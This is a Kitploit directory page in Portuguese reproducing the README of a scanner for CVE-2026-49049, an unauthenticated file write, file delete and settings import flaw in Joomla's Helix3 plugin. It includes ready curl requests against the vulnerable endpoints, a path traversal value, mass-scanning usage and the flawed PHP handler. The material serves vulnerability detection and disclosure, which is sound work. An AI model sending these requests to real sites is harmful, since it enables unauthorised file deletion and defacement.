Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/shinthink/cve-2026-49049
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubshinthink/cve-2026-49049

CVE-2026-49049

Scanner de vulnerabilidade somente leitura para CVE-2026-49049 — manipulador AJAX não autenticado do plugin Helix3 Joomla

Ver Repositório
41há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Python CVE CVSS Licença

CVE-2026-49049 — Plugin Helix3 Joomla (JoomShaper)

Manipulador AJAX Não Autenticado — Scanner de Vulnerabilidade Somente Leitura


Visão Geral

CVE-2026-49049 afeta o framework de template Helix3 para Joomla (versões 1.0 a 3.1.0). O manipulador onAjaxHelix3, acessível através do dispatcher com_ajax do Joomla, realiza nenhuma autenticação, autorização ou validação CSRF em várias ações destrutivas:

AçãoImpactoDisponível em
saveEscreve arquivos JSON controlados pelo atacante com travessia de caminhoTodas as versões
removeExclui arquivos arbitrários — sem restrição de extensão ou caminhoTodas as versões
importSobrescreve parâmetros de template armazenados no banco de dadosapenas v3.x

Nota: A ação import foi adicionada no Helix3 v3.x. Sites executando v2.x são afetados apenas por save e remove.

A vulnerabilidade foi descoberta por Phil Taylor (mySites.guru) e publicada em 29 de junho de 2026.

Versões Afetadas

Versão do Helix3save/removeimport
1.0 – 2.xVulnerávelNão presente
3.0 – 3.1.0VulnerávelVulnerável
3.1.1+CorrigidoCorrigido

Instalação

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-49049.git
cd CVE-2026-49049
pip install -r requirements.txt

Uso

root@kitploit:~
# Alvo único
python cve_2026_49049.py -t 192.168.1.100

# Varredura em massa
python cve_2026_49049.py -f targets.txt -o results.txt

# Com relatório JSON + verbose
python cve_2026_49049.py -f targets.txt --json report.json -v

Argumentos

root@kitploit:~
  -t, --target     Alvo único (domínio ou IP)
  -f, --file       Arquivo com alvos, um por linha
  -o, --output     Saída de texto em tempo real (padrão: cve-2026-49049_scan.txt)
  --json           Relatório JSON estruturado (padrão: cve-2026-49049_report.json)
  --threads        Trabalhadores simultâneos (padrão: 15)
  --timeout        Timeout HTTP em segundos (padrão: 15)
  -v, --verbose    Mostrar detalhes da verificação

Prova de Conceito

Detecção e Validação

O scanner realiza uma sonda somente leitura — ele escreve um arquivo JSON inofensivo na pasta de layout do Helix3 através do endpoint save não autenticado, verifica se foi escrito e imediatamente o exclui via endpoint remove. Nenhuma alteração persistente permanece no alvo.

root@kitploit:~
$ python cve_2026_49049.py -t 192.168.1.100 -v
root@kitploit:~
    CVE-2026-49049 — Helix3 (JoomShaper)
    Joomla Unauthenticated AJAX Handler Scanner

    [*] save   — accessible (probe: 3a9719da)
    [*] remove — accessible (probe cleaned)

  Host      : 192.168.1.100
  Status    : vulnerable
  Helix3    : 2.5.6
  Vulnerable: YES
  save      : YES
  remove    : YES
  import    : NO
  Time      : 2.0s

Reprodução Manual

O scanner verifica esses endpoints exatos. Para verificação manual:

Passo 1 — Confirmar que o Helix3 está instalado

root@kitploit:~
curl -sk 'https://target.com/templates/shaper_helix3/templateDetails.xml'
# Look for <version>X.X.X</version>

Passo 2 — Testar ação save (escrita de arquivo não autenticada)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=save&data[layoutName]=_test_probe&data[content]={"probe":"test"}'

Passo 3 — Testar ação remove (exclusão de arquivo não autenticada)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=remove&data[layoutName]=_test_probe.json'

Passo 4 — Testar ação import (apenas v3.x, não disponível na v2.x)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=import&data[template_id]=1&data[settings]={}'

# Nota: import foi adicionado no Helix3 v3.x.
# Sites executando v2.x retornarão uma resposta vazia para esta ação.

Mecanismo da Vulnerabilidade

Nas versões do Helix3 anteriores à 3.1.1, plugins/ajax/helix3/helix3.php processa requisições via onAjaxHelix3() sem proteções:

root@kitploit:~
public function onAjaxHelix3()
{
    $input = Factory::getApplication()->input;
    $data  = $input->post->get('data', [], 'array');
    $action = $data['action'];
    $layoutName = $data['layoutName'];

    // No auth check. No CSRF token. No path validation.
    $filepath = $layoutPath . $layoutName;   // path traversal possible

    switch ($action) {
        case 'remove':
            unlink($filepath);               // arbitrary file delete
            break;
        case 'save':
            fwrite(fopen($filepath . '.json', 'wb'), $data['content']);  // write
            break;
    }
}

O Que Torna Isso Perigoso

  • Save + travessia de diretório — layoutName=../../../somewhere/evil escreve arquivos fora do diretório de layout pretendido
  • Remove não tem restrição de extensão — ao contrário de save (que adiciona .json), remove pode atingir qualquer tipo de arquivo
  • Import (v3.x) sobrescreve parâmetros do banco de dados — custom_js é renderizado sem escape na saída do template, permitindo injeção de script em todas as páginas. Este é o vetor usado em ataques reais de desfiguração.

Aviso Legal

APENAS PARA FINS EDUCACIONAIS E TESTES AUTORIZADOS.

Este software é destinado a profissionais de segurança realizando testes de penetração autorizados, organizações auditando sua própria infraestrutura e pesquisadores estudando exploração de vulnerabilidades.

O acesso não autorizado a sistemas computacionais é ilegal e pode violar:

  • Estados Unidos: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonésia: UU ITE Pasal 30 & 46
  • União Europeia: Diretiva 2013/40/EU
  • Reino Unido: Computer Misuse Act 1990

Os autores não assumem nenhuma responsabilidade por uso indevido. Ao usar este software, você aceita total responsabilidade por suas ações.


Referências

RecursoLink
Aviso Original (mySites.guru)Helix3 3.1.1 Security Fix
Entrada NVDCVE-2026-49049
OpenCVECVE-2026-49049
GitHub JoomShaperHelix3 Repository

Este projeto não é afiliado ao JoomShaper, Joomla ou Open Source Matters, Inc.

Baixar ferramenta